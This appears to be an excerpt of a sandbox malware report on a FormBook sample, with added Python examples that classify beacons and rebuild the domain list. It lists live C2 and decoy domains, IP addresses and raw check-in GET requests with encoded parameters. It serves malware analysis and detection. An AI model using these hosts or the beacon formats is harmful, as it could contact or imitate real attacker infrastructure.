Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49738 -> 103.235.46.96:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49739 -> 76.223.105.230:80
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.214 80
Source: C:\Windows\explorer.exe | Network Connect: 76.223.105.230 80
Source: C:\Windows\explorer.exe | Network Connect: 104.18.23.89 80
Source: C:\Windows\explorer.exe | Network Connect: 103.235.46.96 80
Source: C:\Windows\explorer.exe | Network Connect: 104.18.24.121 80
Source: Malware configuration extractor | URLs: www.wheresthechocolateat.com/pt46/
Source: DNS query: www.iiixc759q.xyz
Source: DNS query: www.iiixc759q.xyz
Source: DNS query: www.iiixc759q.xyz
Source: DNS query: www.iiixc759q.xyz
Source: global traffic | HTTP traffic detected: GET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1 | Host: www.arlatwestern.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz HTTP/1.1 | Host: www.wvufcw948o.top | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1 | Host: www.wheresthechocolateat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1 | Host: www.serverdayz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz HTTP/1.1 | Host: www.theselflovesite.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
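The captured check-ins above go to five different hosts, only one of which (www.wheresthechocolateat.com) is the C2 in the extracted configuration; the others are decoys from the same configuration, which FormBook contacts to bury the real server in traffic. As an added example (not code from the Joe Sandbox report, and not a general FormBook signature), the Python below loads the extracted configuration, parses raw HTTP requests constructed from the captured GETs, and labels each request as C2, decoy or unknown, also flagging the two traits the report calls out: the check-in URI shape and the missing User-Agent header. The decoy list is trimmed to the domains the captured requests hit (the report lists 64), and the URI regex is derived only from the requests on this page.

```python
"""Added example (not code from the Joe Sandbox report): load the FormBook
configuration the sandbox extracted (one real C2 URL plus decoy domains) and
classify the captured HTTP check-ins. FormBook beacons to decoy domains as
well as to the real C2, so a Host header alone does not identify the
operator's server; the extracted configuration does.
Inputs are constructed from the report's 'Malware Configuration Extractor' and
'HTTP traffic detected' lines (decoy list trimmed to the domains the captured
requests hit; the report lists 64)."""
import json
import re
from urllib.parse import urlsplit

CONFIG_JSON = ('{"C2 list": ["www.wheresthechocolateat.com/pt46/"], '
               '"decoy": ["theselflovesite.com", "arlatwestern.shop", '
               '"wvufcw948o.top", "serverdayz.com"]}')

# Constructed raw requests mirroring the sandbox capture (no User-Agent, Connection: close).
REQUESTS = [
    "GET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1\r\n"
    "Host: www.arlatwestern.shop\r\nConnection: close\r\n\r\n",
    "GET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1\r\n"
    "Host: www.wheresthechocolateat.com\r\nConnection: close\r\n\r\n",
    "GET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1\r\n"
    "Host: www.serverdayz.com\r\nConnection: close\r\n\r\n",
    # Constructed benign control request.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

# URI shape derived from the requests on this page only (not a general FormBook
# signature): short panel directory, one short parameter carrying a long
# base64-like blob, one short trailing parameter.
CHECKIN_URI = re.compile(
    r"^/[A-Za-z0-9]{2,8}/\?[A-Za-z0-9]{2,6}=[A-Za-z0-9+/]{40,}&[A-Za-z0-9]{2,6}=_?[A-Za-z0-9]+$")


def norm_host(host):
    """Lower-case a host name and drop a leading 'www.' so config and Host header compare."""
    host = host.strip().lower()
    return host[4:] if host.startswith("www.") else host


def load_config(raw_json):
    """Return ({(host, path)} for real C2 URLs, {decoy hosts}) from the extracted config."""
    cfg = json.loads(raw_json)
    c2 = set()
    for url in cfg["C2 list"]:
        parts = urlsplit("http://" + url)
        c2.add((norm_host(parts.hostname), parts.path))
    decoys = {norm_host(d) for d in cfg["decoy"]}
    return c2, decoys


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, request-target, lower-cased headers)."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify(raw, c2, decoys):
    """Label one request as c2 / decoy / unknown and list the traits that fired."""
    method, target, headers = parse_request(raw)
    host = norm_host(headers.get("host", ""))
    path = urlsplit(target).path
    flags = []
    if method == "GET" and CHECKIN_URI.match(target):
        flags.append("checkin_uri_shape")
    if "user-agent" not in headers:
        flags.append("no_user_agent")
    if (host, path) in c2:
        verdict = "c2"
    elif host in decoys:
        verdict = "decoy"
    else:
        verdict = "unknown"
    return {"host": host, "verdict": verdict, "flags": flags}


def triage(requests=REQUESTS, raw_json=CONFIG_JSON):
    """Classify every request against the configuration; order follows the input."""
    c2, decoys = load_config(raw_json)
    return [classify(r, c2, decoys) for r in requests]


if __name__ == "__main__":
    for result in triage():
        print(result)
```

Blocking only the Host names seen in a capture would leave the decoys in place and the real C2 reachable whenever the sandbox happened not to roll it; the configuration dump is the artifact to pivot on, and the URI-shape and missing-User-Agent traits are what a network sensor can key on before a configuration has been extracted.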
          Source: Joe Sandbox ViewIP Address: 103.224.212.214 103.224.212.214
          Source: Joe Sandbox ViewIP Address: 76.223.105.230 76.223.105.230
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries)
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: 0_2_00CF25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_00CF25E2
Source: global traffic | DNS traffic detected: DNS query: www.strategiclogisticsagency.com
Source: global traffic | DNS traffic detected: DNS query: www.arlatwestern.shop
Source: global traffic | DNS traffic detected: DNS query: www.betbox2341.com
Source: global traffic | DNS traffic detected: DNS query: www.af28.top
Source: global traffic | DNS traffic detected: DNS query: www.wvufcw948o.top
Source: global traffic | DNS traffic detected: DNS query: www.wheresthechocolateat.com
Source: global traffic | DNS traffic detected: DNS query: www.serverdayz.com
Source: global traffic | DNS traffic detected: DNS query: www.theselflovesite.com
Source: global traffic | DNS traffic detected: DNS query: www.iiixc759q.xyz
Source: global traffic | DNS traffic detected: DNS query: www.sliveringaf.christmas
Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in all seven dumps):
http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1691865413.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1693513837.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1692211406.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000003.3105555593.000000000C9E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105760256.000000000C9C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3459517159.000000000C9E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105408163.000000000C96C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105927486.000000000C9E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000002.4136039425.0000000009920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105787292.0000000009920000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in both dumps unless noted; every domain appears bare, with the /pt46/ path used by the HTTP requests above, run together with "Referer:", and, for all but www.harbalmaizik.com, with /pt46/ followed by the next domain):
http://www.af28.top
http://www.af28.top/pt46/
http://www.af28.top/pt46/www.wvufcw948o.top
http://www.af28.topReferer:
http://www.arlatwestern.shop
http://www.arlatwestern.shop/pt46/
http://www.arlatwestern.shop/pt46/www.betbox2341.com
http://www.arlatwestern.shopReferer:
http://www.betbox2341.com
http://www.betbox2341.com/pt46/
http://www.betbox2341.com/pt46/www.dreziuy.xyz
http://www.betbox2341.comReferer:
http://www.cb214.pro
http://www.cb214.pro/pt46/
http://www.cb214.pro/pt46/www.uddyen.shop
http://www.cb214.proReferer:
http://www.dreziuy.xyz
http://www.dreziuy.xyz/pt46/
http://www.dreziuy.xyz/pt46/www.af28.top
http://www.dreziuy.xyzReferer:
http://www.harbalmaizik.com
http://www.harbalmaizik.com/pt46/ (00000002.00000003.3105787292 dump only)
http://www.harbalmaizik.comReferer:
http://www.iiixc759q.xyz
http://www.iiixc759q.xyz/pt46/
http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmas
http://www.iiixc759q.xyzReferer:
http://www.per-watch.com
http://www.per-watch.com/pt46/
http://www.per-watch.com/pt46/www.cb214.pro
http://www.per-watch.comReferer:
http://www.serverdayz.com
http://www.serverdayz.com/pt46/
http://www.serverdayz.com/pt46/www.theselflovesite.com
http://www.serverdayz.comReferer:
http://www.sliveringaf.christmas
http://www.sliveringaf.christmas/pt46/
http://www.sliveringaf.christmas/pt46/www.twinportslocal.com
http://www.sliveringaf.christmasReferer:
http://www.strategiclogisticsagency.com
http://www.strategiclogisticsagency.com/pt46/
http://www.strategiclogisticsagency.com/pt46/www.arlatwestern.shop
http://www.strategiclogisticsagency.comReferer:
http://www.theselflovesite.com
http://www.theselflovesite.com/pt46/
http://www.theselflovesite.com/pt46/www.iiixc759q.xyz
http://www.theselflovesite.comReferer:
http://www.twinportslocal.com
http://www.twinportslocal.com/pt46/
http://www.twinportslocal.com/pt46/www.per-watch.com
http://www.twinportslocal.comReferer:
http://www.uddyen.shop
http://www.uddyen.shop/pt46/
http://www.uddyen.shop/pt46/www.harbalmaizik.com
http://www.uddyen.shopReferer:
http://www.wheresthechocolateat.com
http://www.wheresthechocolateat.com/pt46/
http://www.wheresthechocolateat.com/pt46/www.serverdayz.com
http://www.wheresthechocolateat.comReferer:
http://www.wvufcw948o.top
http://www.wvufcw948o.top/pt46/
http://www.wvufcw948o.top/pt46/www.wheresthechocolateat.com
http://www.wvufcw948o.topReferer:
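The "http://www.A/pt46/www.B" strings above can be read as two adjacent entries of the in-memory domain list, run together because the string scanner crossed the separator between them; under that reading, B follows A in the list the injected code walks. The Python below is an added example, not part of the Joe Sandbox report: it rebuilds that order from the report's own strings and checks it against the DNS queries listed earlier in this section. The adjacency assumption is this example's and is not stated by the report. Under it the list runs from www.strategiclogisticsagency.com to www.harbalmaizik.com (16 domains), and the ten DNS queries the report records appear in that order, with www.dreziuy.xyz (fourth in the list) absent from the captured queries.

```python
"""Rebuild the ordered domain list from the run-together memory strings.

Added example, not part of the Joe Sandbox report. MEMORY_STRINGS and
REPORT_DNS_QUERIES are copied from the report. The assumption that each
"http://www.A/pt46/www.B" string is two adjacent entries of the in-memory
list, read across their separator, is this example's and is not stated by
the report.
"""
import re

# Every "/pt46/" string from the explorer.exe dumps that carries a following domain,
# plus the one domain (www.harbalmaizik.com) whose "/pt46/" string carries none.
MEMORY_STRINGS = [
    "http://www.af28.top/pt46/www.wvufcw948o.top",
    "http://www.arlatwestern.shop/pt46/www.betbox2341.com",
    "http://www.betbox2341.com/pt46/www.dreziuy.xyz",
    "http://www.cb214.pro/pt46/www.uddyen.shop",
    "http://www.dreziuy.xyz/pt46/www.af28.top",
    "http://www.harbalmaizik.com/pt46/",
    "http://www.iiixc759q.xyz/pt46/www.sliveringaf.christmas",
    "http://www.per-watch.com/pt46/www.cb214.pro",
    "http://www.serverdayz.com/pt46/www.theselflovesite.com",
    "http://www.sliveringaf.christmas/pt46/www.twinportslocal.com",
    "http://www.strategiclogisticsagency.com/pt46/www.arlatwestern.shop",
    "http://www.theselflovesite.com/pt46/www.iiixc759q.xyz",
    "http://www.twinportslocal.com/pt46/www.per-watch.com",
    "http://www.uddyen.shop/pt46/www.harbalmaizik.com",
    "http://www.wheresthechocolateat.com/pt46/www.serverdayz.com",
    "http://www.wvufcw948o.top/pt46/www.wheresthechocolateat.com",
]

# The DNS queries the report lists, in the order it lists them.
REPORT_DNS_QUERIES = [
    "www.strategiclogisticsagency.com", "www.arlatwestern.shop", "www.betbox2341.com",
    "www.af28.top", "www.wvufcw948o.top", "www.wheresthechocolateat.com",
    "www.serverdayz.com", "www.theselflovesite.com", "www.iiixc759q.xyz",
    "www.sliveringaf.christmas",
]

# "http://<this domain><path><next domain, if the scanner ran into it>"
ENTRY_RE = re.compile(r"^http://(?P<cur>[\w.-]+)(?P<path>/[^/]+/)(?P<next>[\w.-]+)?$")


def successor_map(strings):
    """Map each domain to the one following it (None for the last); also return the URI paths seen."""
    following, paths = {}, set()
    for s in strings:
        m = ENTRY_RE.match(s)
        if not m:
            raise ValueError(f"not a list entry: {s}")
        paths.add(m["path"])
        cur, nxt = m["cur"], m["next"]
        if cur in following and following[cur] not in (None, nxt):
            raise ValueError(f"{cur} has two different successors")
        if nxt or cur not in following:   # never let a bare "/pt46/" entry erase a known successor
            following[cur] = nxt
    return following, paths


def ordered_domains(strings):
    """Walk from the one domain nothing points to until a domain with no successor."""
    following, paths = successor_map(strings)
    if len(paths) != 1:
        raise ValueError(f"entries use several URI paths: {sorted(paths)}")
    pointed_to = {d for d in following.values() if d}
    heads = [d for d in following if d not in pointed_to]
    if len(heads) != 1:
        raise ValueError(f"expected exactly one list head, found {heads}")
    order, cur = [], heads[0]
    while cur is not None:
        if cur in order:
            raise ValueError(f"cycle at {cur}")
        order.append(cur)
        cur = following.get(cur)
    return order


def follows_list_order(order, queried):
    """True when every queried name is in the list and the queries advance through it (skips allowed)."""
    pos = {d: i for i, d in enumerate(order)}
    if any(q not in pos for q in queried):
        return False
    idx = [pos[q] for q in queried]
    return all(a < b for a, b in zip(idx, idx[1:]))


if __name__ == "__main__":
    order = ordered_domains(MEMORY_STRINGS)
    for i, d in enumerate(order, 1):
        print(f"{i:2d}. {d}{'  (queried in the sandbox)' if d in REPORT_DNS_QUERIES else ''}")
    print("DNS queries follow the recovered order:", follows_list_order(order, REPORT_DNS_QUERIES))
```

The checks in successor_map and ordered_domains (one URI path, one head, no conflicting successors, no cycle) are what make the result trustworthy: if the memory strings came from two different configurations or the scanner crossed into unrelated data, one of them fails instead of silently producing a plausible-looking list.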
Source: explorer.exe, 00000002.00000002.4140282960.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000003.3106633874.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3460584807.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in all four dumps):
https://aka.ms/Vh5j3k
https://aka.ms/odirmr
Source: explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in all three dumps):
https://api.msn.com/
https://api.msn.com/q
Source: explorer.exe, 00000002.00000003.3106168394.000000000370C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1689421326.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1690234214.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4131906995.000000000371D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4130664526.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3107315493.000000000371C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4135304707.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000002.4135304707.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106730980.0000000009701000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1692654831.00000000096DF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory:
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in both dumps):
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in both dumps):
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp | Strings found in binary or memory (each in both dumps):
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1694928784.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4140282960.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
